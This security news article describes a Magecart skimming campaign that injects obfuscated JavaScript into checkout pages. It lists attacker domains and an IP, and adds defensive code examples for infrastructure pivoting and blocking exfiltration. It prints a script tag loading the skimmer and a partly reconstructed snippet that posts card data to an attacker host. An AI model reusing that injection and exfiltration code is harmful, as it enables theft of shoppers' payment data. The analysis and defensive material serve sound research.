New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data


The threat landscape for e-commerce websites has once again shifted with the emergence of a sophisticated Magecart-style attack campaign, characterized by the deployment of obfuscated JavaScript to harvest sensitive payment information.

The campaign first came to light in mid-September 2025, when a tweet flagged an ongoing skimming operation; security researcher Himanshu Anand subsequently investigated it in detail.

This new episode shows the persistent ingenuity of web skimming groups, which continue to rely on client-side injection to intercept card data from live checkouts at scale.


The attack works by injecting malicious JavaScript, hosted on attacker-controlled domains such as cc-analytics[.]com, into the checkout pages of compromised e-commerce sites.

Once inserted, the script seamlessly blends into legitimate payment workflows, hooking into form fields and event listeners to silently exfiltrate payment data.

The initial code observed was heavily obfuscated, designed both to evade detection by security scanners and to frustrate analysis by incident responders.

The same code has been reused across several campaigns, with the skimmer logic replicated under different domain names such as getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on shared infrastructure such as the IP address 45.61.136.141.

Hosting IP extracted from URLScan transaction logs (Source – Himanshu Anand)

Anand used passive DNS and infrastructure fingerprinting to expand the picture of the attacker's infrastructure well beyond the first domain observed.

By analyzing public telemetry from sources like URLScan and WHOIS records, Anand was able to map out a constellation of related domains linked to a single cluster of attacker infrastructure.

These pivots revealed more than a dozen active domains, some masquerading as legitimate analytics or utility services, each serving identical or near-identical skimmer payloads.
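The pivot described above, as an added example that is not code from the article or from the cited research: starting from one seed domain, it expands through shared hosting IPs until no new domains appear, which is how a single cluster is recovered from passive DNS or URLScan style telemetry. The records are constructed for the example; the domains and the IP 45.61.136.141 are the indicators the article names, but which domain resolved to which IP, the second IP 198.51.100.9, and the shared-hosting IP 192.0.2.50 are assumptions made here. The `maxDomainsPerIp` threshold is the caveat a practitioner needs: one shared-hosting or CDN IP would otherwise pull every unrelated tenant into the cluster.

```javascript
// Added example (not from the article or the researcher it cites): passive-DNS
// pivoting from a seed domain across shared IPs, with a guard against noisy IPs.

// Constructed records. Only the domain names and 45.61.136.141 come from the
// article; the per-domain IP assignments and the other IPs are assumptions.
const RECORDS = [
  { domain: 'cc-analytics.com',  ip: '45.61.136.141' },
  { domain: 'getnjs.com',        ip: '45.61.136.141' },
  { domain: 'getvjs.com',        ip: '45.61.136.141' },
  { domain: 'utilanalytics.com', ip: '45.61.136.141' },
  // constructed: an older IP shared by the loader host and the exfil host
  { domain: 'cc-analytics.com',  ip: '198.51.100.9' },
  { domain: 'pstatics.com',      ip: '198.51.100.9' },
  // constructed: the exfil host later moved to a large shared-hosting IP
  { domain: 'pstatics.com',      ip: '192.0.2.50' },
  { domain: 'unrelated.example', ip: '203.0.113.7' },
];
// constructed: 25 unrelated tenants on the shared-hosting IP
for (let i = 0; i < 25; i++) {
  RECORDS.push({ domain: `tenant${i}.example`, ip: '192.0.2.50' });
}

// Build the two lookup directions the pivot alternates between.
function index(records) {
  const byDomain = new Map();
  const byIp = new Map();
  for (const { domain, ip } of records) {
    if (!byDomain.has(domain)) byDomain.set(domain, new Set());
    if (!byIp.has(ip)) byIp.set(ip, new Set());
    byDomain.get(domain).add(ip);
    byIp.get(ip).add(domain);
  }
  return { byDomain, byIp };
}

// Breadth-first expansion: domain -> its IPs -> every domain on those IPs -> ...
// IPs hosting more than maxDomainsPerIp domains are treated as shared hosting
// and are not expanded, so they do not drag in unrelated sites.
function pivotCluster(records, seedDomain, maxDomainsPerIp = 10) {
  const { byDomain, byIp } = index(records);
  const domains = new Set([seedDomain]);
  const ips = new Set();
  const skippedIps = new Set();
  const queue = [seedDomain];
  while (queue.length > 0) {
    const domain = queue.shift();
    for (const ip of byDomain.get(domain) || []) {
      if (ips.has(ip) || skippedIps.has(ip)) continue;
      const tenants = byIp.get(ip);
      if (tenants.size > maxDomainsPerIp) {
        skippedIps.add(ip); // noisy shared infrastructure: record it, do not expand
        continue;
      }
      ips.add(ip);
      for (const other of tenants) {
        if (!domains.has(other)) {
          domains.add(other);
          queue.push(other);
        }
      }
    }
  }
  return {
    domains: [...domains].sort(),
    ips: [...ips].sort(),
    skippedIps: [...skippedIps].sort(),
  };
}

console.log(pivotCluster(RECORDS, 'cc-analytics.com'));
```

Run against real telemetry, the skipped IPs list is what you review by hand: a cluster that stays small after the threshold is a much stronger signal than one inflated by a hosting provider's address.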

The Malware’s Infection Mechanism

Central to the success of this Magecart operation is its infection mechanism: a highly automated skimmer script loaded through an injected tag of the form <script src="https[:]//www[.]cc-analytics[.]com/app[.]js">.

Once active, the code attaches event handlers to the payment input fields, such as the card number and billing address fields. When triggered, the script collects the entered card data and immediately posts it to a remote server (pstatics[.]com) using XMLHttpRequest and FormData objects.

The core data exfiltration logic can be described as follows (reconstructed from the garbled listing; the endpoint path and the second field name are partly illegible in the source and are left as they appear):

```javascript
function sendStolenData(data) {
  const xhr = new XMLHttpRequest();
  xhr.open('POST', 'https[:]//www.pstatics[.]com/i'); // path truncated in the source
  const formData = new FormData();
  formData.append('uid', data.cardNumber);            // card number
  formData.append('id', data.billing);                // billing data; name partly garbled in the source
  xhr.send(formData);
}
```

The design ensures that only plausible, non-test card numbers, those meeting certain length criteria, are transmitted, maximizing the quality and value of the stolen data.
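The same filter the skimmer applies before exfiltrating can be turned around and used by the defender. The following is an added example, not code from the article or from the researcher it cites: a client-side guard that wraps XMLHttpRequest on the checkout page and refuses to send any request that carries a card-number-like value to an origin the page is not expected to talk to. The allowlisted origins shop.example and api.psp.example are hypothetical, and the Luhn check goes beyond the "length criteria" the article mentions; pstatics[.]com in the sample request is the exfiltration host the article names.

```javascript
// Added example (not from the article or the cited research): an outbound
// request guard for a checkout page. Origins and the Luhn check are assumptions.

// Luhn checksum: the standard test that separates real PANs from random digits.
function luhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// A value "looks like a PAN" if, after stripping spaces and dashes, it is
// 13-19 digits long and passes Luhn (the length criteria plus a checksum).
function looksLikePan(value) {
  const digits = String(value).replace(/[\s-]/g, '');
  return /^\d{13,19}$/.test(digits) && luhnValid(digits);
}

// Origins the checkout page legitimately posts to (hypothetical shop and PSP).
const ALLOWED_ORIGINS = new Set(['https://shop.example', 'https://api.psp.example']);

// Inspect one outbound request. `fields` is an array of [name, value] pairs,
// which is what FormData.prototype.entries() yields. Returns a finding or null.
function inspectOutbound(url, fields, base = 'https://shop.example/checkout') {
  let origin;
  try {
    origin = new URL(url, base).origin;
  } catch (e) {
    origin = 'invalid:' + url;
  }
  if (ALLOWED_ORIGINS.has(origin)) return null;
  const leaked = fields.filter(([, value]) => looksLikePan(value)).map(([name]) => name);
  if (leaked.length === 0) return null;
  return { destination: origin, fields: leaked };
}

// Browser hook: patch XMLHttpRequest so every send() is inspected before the
// data leaves the page. Returns false where XMLHttpRequest does not exist (Node).
function installGuard(g, report = console.warn) {
  if (!g.XMLHttpRequest) return false;
  const proto = g.XMLHttpRequest.prototype;
  const origOpen = proto.open;
  const origSend = proto.send;
  proto.open = function (method, url, ...rest) {
    this.__guardUrl = String(url); // remember the destination for send()
    return origOpen.call(this, method, url, ...rest);
  };
  proto.send = function (body) {
    const fields = body && typeof body.entries === 'function' ? [...body.entries()] : [];
    const finding = inspectOutbound(this.__guardUrl, fields, g.location && g.location.href);
    if (finding) {
      report('possible skimmer exfiltration blocked', finding);
      return; // drop the request; a monitor-only deployment would report and continue
    }
    return origSend.call(this, body);
  };
  return true;
}

// Constructed sample: the kind of POST the skimmer above would emit. The card
// number is the well-known 4111... test value, which passes Luhn.
const SAMPLE_EXFIL = {
  url: 'https://www.pstatics.com/i',
  fields: [['uid', '4111 1111 1111 1111'], ['id', '1 Main St, Springfield']],
};

installGuard(globalThis);
console.log(inspectOutbound(SAMPLE_EXFIL.url, SAMPLE_EXFIL.fields));
```

Wrapping XMLHttpRequest only catches this skimmer's transport; a production guard would patch fetch, navigator.sendBeacon and image-beacon URLs the same way, and a Content-Security-Policy whose connect-src and script-src list only the allowlisted origins blocks both the loader from cc-analytics[.]com and the POST to pstatics[.]com without any client-side code at all.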

This infection pathway is further reinforced by persistent infrastructure, with attackers recycling domain patterns over time.



